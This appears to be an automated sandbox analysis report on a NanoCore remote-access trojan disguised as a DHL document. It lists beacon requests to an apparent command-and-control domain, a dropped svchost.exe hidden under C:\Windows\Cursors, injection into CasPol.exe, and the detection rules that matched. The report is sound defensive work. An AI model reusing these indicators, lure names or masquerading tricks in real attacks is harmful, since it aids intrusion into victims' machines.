          Source: global trafficHTTP traffic detected: GET /base/F55ACED73ADD255559F0ED65FFDFD3E9.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /base/D9CFC9FB28456A5A139C9F495F1407BB.html HTTP/1.1Host: coroloboxorozor.com
          Source: global trafficHTTP traffic detected: GET /base/40146EDED8BA63D6AE3F2DAF99B02171.html HTTP/1.1Host: coroloboxorozor.com
          Source: global trafficHTTP traffic detected: GET /base/F55ACED73ADD255559F0ED65FFDFD3E9.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /base/D9CFC9FB28456A5A139C9F495F1407BB.html HTTP/1.1Host: coroloboxorozor.com
          Source: global trafficHTTP traffic detected: GET /base/F55ACED73ADD255559F0ED65FFDFD3E9.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /base/D9CFC9FB28456A5A139C9F495F1407BB.html HTTP/1.1Host: coroloboxorozor.com
          Source: global trafficHTTP traffic detected: GET /base/40146EDED8BA63D6AE3F2DAF99B02171.html HTTP/1.1Host: coroloboxorozor.com
          Source: global trafficHTTP traffic detected: GET /base/40146EDED8BA63D6AE3F2DAF99B02171.html HTTP/1.1Host: coroloboxorozor.com
          Source: unknownDNS traffic detected: queries for: coroloboxorozor.com
          Source: DHL_document1102202068090891.exe, 00000000.00000003.369776362.0000000006F86000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2Assu
          Source: DHL_document1102202068090891.exe, 00000000.00000002.522822282.00000000032AB000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.523044419.0000000003141000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com
          Source: DHL_document1102202068090891.exe, 00000000.00000002.522226985.0000000003231000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.523044419.0000000003141000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/40146EDED8BA63D6AE3F2DAF99B02171.html
          Source: DHL_document1102202068090891.exe, 00000000.00000002.522226985.0000000003231000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/D9CFC9FB28456A5A139C9F495F1407BB.html
          Source: DHL_document1102202068090891.exe, 00000000.00000002.522226985.0000000003231000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.523044419.0000000003141000.00000004.00000001.sdmpString found in binary or memory: http://coroloboxorozor.com/base/F55ACED73ADD255559F0ED65FFDFD3E9.html
          Source: powershell.exe, 00000012.00000002.520764725.0000000000C68000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
          Source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
          Source: svchost.exe, 00000004.00000002.526127294.00000194BB814000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
          Source: DHL_document1102202068090891.exe, 00000000.00000003.369776362.0000000006F86000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
          Source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
          Source: DHL_document1102202068090891.exe, 00000000.00000003.369776362.0000000006F86000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.dig
          Source: svchost.exe, 00000004.00000002.526127294.00000194BB814000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: DHL_document1102202068090891.exe, 00000000.00000003.369776362.0000000006F86000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0O
          Source: svchost.exe, 00000004.00000002.526127294.00000194BB814000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
          Source: powershell.exe, 00000012.00000002.528890375.00000000048B3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: svchost.exe, 00000004.00000002.511485026.00000194B60AF000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2
          Source: svchost.exe, 00000004.00000002.511485026.00000194B60AF000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004
          Source: svchost.exe, 00000004.00000002.528455496.00000194BBA00000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: DHL_document1102202068090891.exe, 00000000.00000002.522226985.0000000003231000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.523044419.0000000003141000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.528012031.0000000004771000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000012.00000002.528890375.00000000048B3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: svchost.exe, 00000007.00000002.305629509.000002278FC13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
          Source: powershell.exe, 0000000A.00000003.455029492.0000000009C2C000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoft.cN
          Source: AdvancedRun.exe, AdvancedRun.exe, 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
          Source: svchost.exe, 00000005.00000002.508997125.0000022579443000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
          Source: svchost.exe, 00000005.00000002.508997125.0000022579443000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
          Source: svchost.exe, 00000005.00000002.508997125.0000022579443000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
          Source: svchost.exe, 00000007.00000003.305361825.000002278FC5F000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
          Source: svchost.exe, 00000005.00000002.508997125.0000022579443000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
          Source: svchost.exe, 00000005.00000002.508997125.0000022579443000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
          Source: svchost.exe, 00000007.00000003.305387105.000002278FC49000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000007.00000003.305361825.000002278FC5F000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
          Source: svchost.exe, 00000007.00000002.305652333.000002278FC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
          Source: svchost.exe, 00000007.00000003.305361825.000002278FC5F000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
          Source: svchost.exe, 00000007.00000002.305661530.000002278FC4E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
          Source: svchost.exe, 00000007.00000003.283577676.000002278FC2F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000007.00000003.283577676.000002278FC2F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
          Source: svchost.exe, 00000007.00000002.305652333.000002278FC3D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
          Source: svchost.exe, 00000007.00000003.305361825.000002278FC5F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
          Source: svchost.exe, 00000007.00000003.305361825.000002278FC5F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
          Source: svchost.exe, 00000007.00000003.305361825.000002278FC5F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
          Source: svchost.exe, 00000007.00000003.283577676.000002278FC2F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
          Source: svchost.exe, 00000007.00000003.305403663.000002278FC40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
          Source: svchost.exe, 00000007.00000003.305403663.000002278FC40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
          Source: svchost.exe, 00000007.00000003.305361825.000002278FC5F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
          Source: svchost.exe, 00000007.00000002.305658651.000002278FC4B000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.305403663.000002278FC40000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
          Source: svchost.exe, 00000007.00000003.283577676.000002278FC2F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
          Source: svchost.exe, 00000007.00000003.305387105.000002278FC49000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000007.00000002.305658651.000002278FC4B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000007.00000002.305658651.000002278FC4B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000007.00000002.305661530.000002278FC4E000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
          Source: svchost.exe, 00000007.00000003.305361825.000002278FC5F000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
          Source: svchost.exe, 00000007.00000003.283577676.000002278FC2F000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305652333.000002278FC3D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000007.00000003.283577676.000002278FC2F000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
          Source: powershell.exe, 0000000A.00000003.396400202.0000000005CBE000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
          Source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0C
          Source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0D
          Source: svchost.exe, 00000007.00000002.305652333.000002278FC3D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
          Source: svchost.exe, 00000007.00000002.305652333.000002278FC3D000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.305629509.000002278FC13000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000007.00000003.305400692.000002278FC45000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000007.00000003.305400692.000002278FC45000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000007.00000003.283577676.000002278FC2F000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
          Source: svchost.exe, 00000007.00000003.283577676.000002278FC2F000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
          Source: svchost.exe, 00000007.00000002.305661530.000002278FC4E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
          Source: DHL_document1102202068090891.exe, 00000000.00000003.369776362.0000000006F86000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: svchost.exe, 00000011.00000002.513166260.0000000001200000.00000004.00000001.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 0000001D.00000002.529223776.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6560, type: MEMORY
          Source: Yara matchFile source: 28.2.svchost.exe.4806e98.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.3ddff94.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.5ae0000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.3ddb15e.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.3ddff94.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.3de45bd.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.svchost.exe.4341dc8.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.5ae4629.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.svchost.exe.4341dc8.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 28.2.svchost.exe.4806e98.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.CasPol.exe.5ae0000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL_document1102202068090891.exe.48057c0.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000001D.00000002.539788145.0000000005370000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: Process Memory Space: svchost.exe PID: 6560, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: Process Memory Space: svchost.exe PID: 6560, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 28.2.svchost.exe.4806e98.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 28.2.svchost.exe.4806e98.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 29.2.CasPol.exe.3ddff94.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 29.2.CasPol.exe.5ae0000.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 29.2.CasPol.exe.3ddb15e.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 29.2.CasPol.exe.3ddb15e.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 29.2.CasPol.exe.3ddff94.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 29.2.CasPol.exe.2dfb8c8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 29.2.CasPol.exe.3de45bd.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 29.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 29.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 17.2.svchost.exe.4341dc8.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 17.2.svchost.exe.4341dc8.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 29.2.CasPol.exe.5370000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 29.2.CasPol.exe.5ae4629.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 17.2.svchost.exe.4341dc8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 17.2.svchost.exe.4341dc8.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 28.2.svchost.exe.4806e98.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 28.2.svchost.exe.4806e98.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 29.2.CasPol.exe.5ae0000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0.2.DHL_document1102202068090891.exe.48057c0.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0.2.DHL_document1102202068090891.exe.48057c0.7.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: DHL_document1102202068090891.exeStatic file information: Suspicious name
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: DHL_document1102202068090891.exe
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_069D6998 NtSetInformationThread,
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeFile created: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrhJump to behavior
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_0172C328
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_0172EDE3
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_0172EDE8
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_069D0040
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_069D8D10
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_069D9A70
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_069D0006
          Source: C:\Users\user\Desktop\DHL_document1102202068090891.exeCode function: 0_2_06CD0040
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeCode function: 17_2_0566C328
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00918198
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00916258
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00913318
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00914478
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00910040
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00919F58
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00E1D220
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00E1619C
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00E1DD88
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00E1DD78
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeCode function: 28_2_0574C328
          Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exeCode function: 28_2_0574EB90
          Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeCode function: String function: 0040B550 appears 50 times
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5308 -ip 5308
          Source: DHL_document1102202068090891.exeStatic PE information: invalid certificate
          Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: AdvancedRun.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DHL_document1102202068090891.exe, 00000000.00000002.542947767.0000000004239000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs DHL_document1102202068090891.exe
          Source: DHL_document1102202068090891.exe, 00000000.00000002.520762387.0000000001820000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs DHL_document1102202068090891.exe
          Source: DHL_document1102202068090891.exe, 00000000.00000002.504969739.0000000000F00000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameGecvcAeU.exe2 vs DHL_document1102202068090891.exe
          Source: DHL_document1102202068090891.exe, 00000000.00000002.552836368.0000000006CF0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs DHL_document1102202068090891.exe
          Source: DHL_document1102202068090891.exe, 00000000.00000002.553111281.0000000006DE0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs DHL_document1102202068090891.exe
          Source: DHL_document1102202068090891.exe, 00000000.00000002.553111281.0000000006DE0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs DHL_document1102202068090891.exe
          Source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmpBinary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X&lt;&gt;&quot;&deg;&amp;<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs DHL_document1102202068090891.exe
          Source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAdvancedRun.exe8 vs DHL_document1102202068090891.exe
          Source: DHL_document1102202068090891.exe, 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMlZW NWd.exe2 vs DHL_document1102202068090891.exe
          Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
          Source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
